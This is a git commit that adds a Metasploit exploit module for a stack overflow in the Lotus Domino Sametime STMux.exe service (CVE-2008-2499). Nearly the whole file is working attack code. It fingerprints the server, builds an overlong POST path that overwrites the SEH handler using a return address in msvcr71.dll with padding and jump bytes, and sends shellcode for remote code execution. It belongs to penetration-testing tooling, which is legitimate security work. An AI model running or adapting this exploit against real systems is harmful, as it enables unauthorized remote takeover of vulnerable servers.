Added domino_sametime_stmux module.

git-svn-id: file:///home/svn/framework3/trunk@5919 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-14 11:04:33 +00:00 · 2008-11-14 11:04:33 +00:00 · e14bf65099
parent f4dd47824e
commit e14bf65099
1 changed files with 120 additions and 0 deletions
--- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb
+++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb
@ -0,0 +1,120 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Lotus Domino Sametime STMux.exe Stack Overflow',
+			'Description'	=> %q{
+				This module exploits a stack overflow in Lotus Domino's Sametime
+				Server. By sending an overly long POST request to the Multiplexer
+				STMux.exe service we are able to overwrite SEH. Based on the exploit
+				by Manuel Santamarina Suarez.
+			},
+			'Author'		=> 'patrick',
+			'Arch'			=> [ ARCH_X86 ],
+			'License'		=> MSF_LICENSE,
+			'Version'		=> '$Revision$',
+			'References'	=>
+			[
+				[ 'BID', '29328' ],
+				[ 'CVE', '2008-2499' ],
+				[ 'OSVDB', '45610' ],
+				[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
+			],
+			'Privileged'		=> true,
+			'DefaultOptions'	=>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'		=>
+				{
+					'Space'			=> 1024,
+					'BadChars'		=> "\x00\x0a\x0d",
+					'StackAdjustment'	=> -3500,
+				},
+			'Platform' => ['win'],
+			'Targets'  =>
+			[
+				# Patrick - Tested OK against Windows 2003 SP1 20081114
+				[ 'Lotus Sametime 7.5 on Windows Server 2000', { 'Ret' => 0x7c3410c2, 'Offset' => 268 } ], # pop ecx, pop exc, ret msvcr71.dll
+				[ 'Lotus Sametime 7.5 on Windows Server 2003', { 'Ret' => 0x7c3410c2, 'Offset' => 269 } ], # pop ecx, pop exc, ret msvcr71.dll
+			],
+			'DisclosureDate' => 'Dec 27 2004', #
+			'DefaultTarget' => 1))
+
+		register_options(
+			[
+				Opt::RPORT(1533),
+			], self.class)
+	end
+
+	def check
+		connect
+
+		req = "HEAD / HTTP/1.0\r\n\r\n"
+		req << "User-Agent: Sametime Community Agent\r\n"
+		req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+		sock.put(req)
+		res = sock.get_once(-1,3)
+
+		disconnect
+
+		if (res =~/Lotus-Domino/)
+			connect
+
+			req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
+			req << "User-Agent: Sametime Community Agent\r\n"
+			req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+			sock.put(req)
+			res = sock.get_once(-1,3)
+
+			disconnect
+			
+			if (res =~/200 OK/)
+				return Exploit::CheckCode::Detected
+			end
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		connect
+
+		# Patrick - We should use Metasm here.
+     		#popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * 3
+		#popad	= Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset']
+		
+		popad = "\x5b" * 3 + "\x61" * target['Offset'] + "\xff\x24\x24" # pop ebx, popad jmp, dword ptr ss:[esp]
+		jmp   = "\x74\x23" + "\x75\x21" # je short, jnz short
+		path  = "\x66" * 44 + jmp + [target['Ret']].pack('V') + "\x66" * 29 + popad
+
+		req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
+		req << "User-Agent: Sametime Community Agent\r\n"
+		req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+		req << "Content-Length: #{payload.encoded.length.to_s}\r\n"
+		req << "Connection: Close\r\n"
+		req << "Cache-Control: no-cache\r\n\r\n"
+		req << payload.encoded
+
+		sock.put(req)
+
+		handler
+		disconnect
+	end
+end